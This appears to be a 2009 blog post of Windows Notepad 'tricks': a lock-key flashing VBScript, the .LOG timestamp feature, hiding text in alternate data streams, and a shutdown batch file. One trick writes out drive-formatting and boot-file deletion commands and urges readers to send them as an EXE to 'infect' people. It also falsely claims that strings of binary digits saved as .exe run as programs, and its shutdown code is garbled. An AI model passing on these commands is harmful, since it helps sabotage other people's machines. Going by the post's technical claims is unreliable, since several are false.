Tuesday, November 10, 2009

What u can do with a help of notepad??

Trick 1 : To Know system time and date
just open a notepad

Now press "F5" and see the result.


Trick 2 : Make your keyboard a "live disco"
This code when executed makes your Caps, Num, Scroll lock keys flash. very attractive ...i have tried it..trust me!!

Instructions:
paste the code given below in notepad
Save as disco.vbs
Run the file

This piece of code makes your keyboard a live disco...

Code:

Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
wshshell.sendkeys "{NUMLOCK}"
wshshell.sendkeys "{SCROLLLOCK}"
loop

TO REMOVE LIVE DISCO ON KEYBOARD WITHOUT CHANGING CODE.
OPEN TASK MANAGER THEN IN PROCESSES END PROCESS WSCRIPT.EXE FILE.


Trick 3 : Appending the time and date to the end of the file
Open a blank Notepad file

* Write .LOG as the first line of the file, press enter.

* Save the file and close it.

* Double-click the file to open it and notice that Notepad appends the current date and time to the end of the file and places the cursor on the line after.

* Type your notes and then save and close the file.

Each time you open the file, Notepad repeats the process, appending the time and date to the end of the file and placing the cursor below it.


Trick 4 : Format a HDD with notepad
Step 1. Copy The Following In Notepad Exactly as it says

01001011000111110010010101010101010000011111100000

Step 2. Save As An EXE Any Name Will Do

Step 3. Send the EXE to People And Infect

OR

IF u think u cannot format c driver when windows is running try Laughing and u will get it Razz .. any way some more so u can test on other drives this is simple binary code

format c:\ /Q/X -- this will format your drive c:\

01100110011011110111001001101101011000010111010000 100000011000110011101001011100
0010000000101111010100010010111101011000

format d:\ /Q/X -- this will format your dirve d:\

01100110011011110111001001101101011000010111010000 100000011001000011101001011100
0010000000101111010100010010111101011000

format a:\ /Q/X -- this will format your drive a:\

01100110011011110111001001101101011000010111010000 100000011000010011101001011100
0010000000101111010100010010111101011000

del /F/S/Q c:\boot.ini -- this will cause your computer not to boot.

01100100011001010110110000100000001011110100011000 101111010100110010111101010001
00100000011000110011101001011100011000100110111101 101111011101000010111001101001
0110111001101001

Trick 5 : Amazing Notepad Trick
This is amazing trick to hide simple txt file from other people, it's useful if you share one commuter with other people

1-open up command prompt window (start menu run type cmd)
2-choose with partion you want to save this file in my case i choosed C and then type c \
3-first we going to create a new notepad file so let's type notepad file1.txt

4- click save and write anything, this file is one it's gonna be visible to other
5-now we going to create the hidden file so we need to type notepad file1.txt:hidden.txt

6-click save and write anything that you don't want anyone to see it

Now here is the trick the file hidden.txt is not visible any where else you can't view or open this file from windows explorer

The only way you can open hidden.txt is by command prompt window

To open it type notepad file1.txt:hidden.txt

This is good way if you want to hide simple txt file from other people, no one can open hidden.txt except if someone know the name of hidden.txt and file1.txt


Trick 6 : Copy The Text From Message Box
Here i will show you how to copy the text from the error message box easily and make the troubleshooting process easier or if you want to see the solution on net.

The full content of the error message can be copied into the clipboard.

Hit "Ctrl + C" (shortcut for ‘copy’),open your text editor (like notepad) and paste it out "Ctrl + V". the result obtained would look like this:



Trick 7 : shut down computer in 20 sec
run Notepad
and type tha following code:
cls/
shutdown-1
cls/
copycon**

save as .bat
then open it and ur pc will shutdown in 20 seconds.It does no harm ur pc.

It's easy to disable this shut down ....the timer will start ...press windows key+r come up run mrnu type this shutdown -i the shutdown timer is disable.....it's simple!

Add To Google BookmarksStumble ThisFav This With TechnoratiAdd To Del.icio.usDigg ThisAdd To RedditTwit ThisAdd To FacebookAdd To Yahoo

No comments:

Post a Comment

Hey Guys! Thanks for visiting my blog. Hope you enjoy reading. Just leave your comments if you think this post is a worth readable! Your valuable comments are always welcomed. Please don't spam! and No abusive language would be tolerated. I would moderate your feedback and then it would be published. If you have any query I will try to give feedback as soon as possible.